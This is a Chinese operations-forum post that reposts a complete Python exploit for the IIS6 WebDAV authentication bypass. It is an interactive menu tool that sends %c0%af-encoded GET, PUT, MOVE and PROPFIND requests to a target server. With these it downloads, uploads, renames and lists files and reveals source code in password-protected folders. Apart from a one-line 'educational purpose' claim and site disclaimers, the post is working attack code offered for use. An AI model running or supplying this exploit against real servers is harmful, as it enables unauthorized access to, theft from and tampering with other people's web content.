设为首页 收藏本站
查看: 815|回复: 0

[经验分享] Microsoft IIS6 WebDAV Remote Auth Bypass Exploit-ReverseAnalysis

[复制链接]

尚未签到

发表于 2018-12-10 12:15:25 | 显示全部楼层 |阅读模式
#############################################  #!/usr/bin/python
  # IIS6 WebDEV Authentication bypass exploit
  #
  # Done by Str0ss
  # mail.str0ss[At]gmail[d0t]com
  #
  # Usage python
  # Follow the instructions
  # This exploit is made for educational purpose
  #
  # For this exploit to work
  # 1. WebDEV should be enabled
  # 2.For File upload / Dir browsing / show source
  # currosponding previlage should be enabled.
  # Exploit will perform only auth'n bypass.
  #
  # Thanks to kcope
  import socket
  def get():
  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((t_IP,t_port))
  fn = raw_input("Enter the file name to fetch:")
  req = "GET /%c0%af" + vul_fold +"/" + fn + " HTTP/1.0\r\n"
  req += "Translate: F\r\n"
  req += "Host: " + t_IP + "\r\n"
  req += "Connection: close\r\n"
  req += "\r\n\r\n"
  sock.send(req)
  data = sock.recv(1024)
  string = ""
  while len(data):
  string = string + data
  data = sock.recv(1024)
  sock.close()
  print "\n_____SERVER RESPONSE_____\n" + string
  print "\n\n USE DISPLAY SOURCE IF GET IS NOT WORKING."
  #put
  def put():
  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((t_IP,t_port))
  file_name = raw_input("Enter the filename to upload [should be in the working dir]:")
  FILE = open(file_name)
  text = FILE.read()
  print "File content:\n" + text
  FILE.close()
  file_length = len(text)
  req = "PUT /%c0%af/" + vul_fold + "/" + file_name +" HTTP/1.0\r\n"
  req += "Connection: close\r\n"
  req += "Host: " + t_IP + "\r\n"
  req += "Content-Type: text/xml; charset='utf-8'\r\n"
  req += "Content-Length: " + str(file_length) +"\r\n\r\n"
  req += text + "\r\n"
  sock.send(req)
  data = sock.recv(1024)
  string = ""
  while len(data):
  string = string + data
  data = sock.recv(1024)
  sock.close()
  print "\n_____SERVER RESPONSE_____\n" + string
  #move
  def move():
  source = raw_input("Enter the source file [old.htm]:")
  target = raw_input("Enter the target file [new.htm]:")
  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((t_IP,t_port))
  req = "MOVE /vul%c0%af/" + source +" HTTP/1.0\r\n"
  req += "Destination: %c0%af/vul/" + target + "\n\n"
  sock.send(req)
  data = sock.recv(1024)
  string = ""
  while len(data):
  string = string + data
  data = sock.recv(1024)
  sock.close()
  print "\n_____SERVER RESPONSE_____\n" + string
  #list
  def list():
  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((t_IP,t_port))
  req = "PROPFIND /%c0%af" + vul_fold + " HTTP/1.0\r\n"
  req += "Connection: close\r\n"
  req += "Host: " + t_IP + "\r\n"
  req += "Content-Length: 0\r\n\r\n"
  sock.send(req)
  data = sock.recv(1024)
  string = ""
  while len(data):
  string = string + data
  data = sock.recv(1024)
  sock.close()
  print "\n_____SERVER RESPONSE_____\n" + string
  #disp source
  def disp():
  sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((t_IP,t_port))
  fn = raw_input("Enter the file name:")
  req = "GET /" + vul_fold +"%c0%af/" + fn + " HTTP/1.0\r\n"
  req += "Translate: f\r\n"
  req += "Connection: close\r\n"
  req += "Host: " + t_IP + "\r\n"
  req += "\r\n\r\n"
  sock.send(req)
  data = sock.recv(1024)
  string = ""
  while len(data):
  string = string + data
  data = sock.recv(1024)
  sock.close()
  print "\n_____SERVER RESPONSE_____\n" + string
  #main program
  t_IP = raw_input("Enter the Terget web server[IIS] IP address:")
  t_port = 80 #change the port is the web server is running on different port
  vul_fold = raw_input("Enter the vulnerable [password protected] folder name:")
  print "Target is :" + t_IP + "/" + vul_fold
  exi = 0
  while(exi == 0):
  print "\n[1] GET a file from vulnerable folder."
  print "\n[2] PUT a file into the vulnerable folder."
  print "\n[3] MOVE a file [Rename]"
  print "\n[4] LIST files in a directory"
  print "\n[5] Display the source code [Same as GET]"
  print "\n[q] Exit"
  inp = raw_input("enter your choice:")
  if inp == '1':
  get()
  if inp == '2':
  put()
  if inp == '3':
  move()
  if inp == '4':
  list()
  if inp == '5':
  disp()
  if inp == 'q':
  exi = 1
  print "\nThanks for using this exploit."
  print "\n For any suggession / quries mailto: mail.str0ss[aT]gmail[d0t]com"


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-649766-1-1.html 上篇帖子: 在IIS6中新增可下载文件类型 下篇帖子: 利用配置文件修改IIS使用的最大虚拟内存和自动回收时间
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表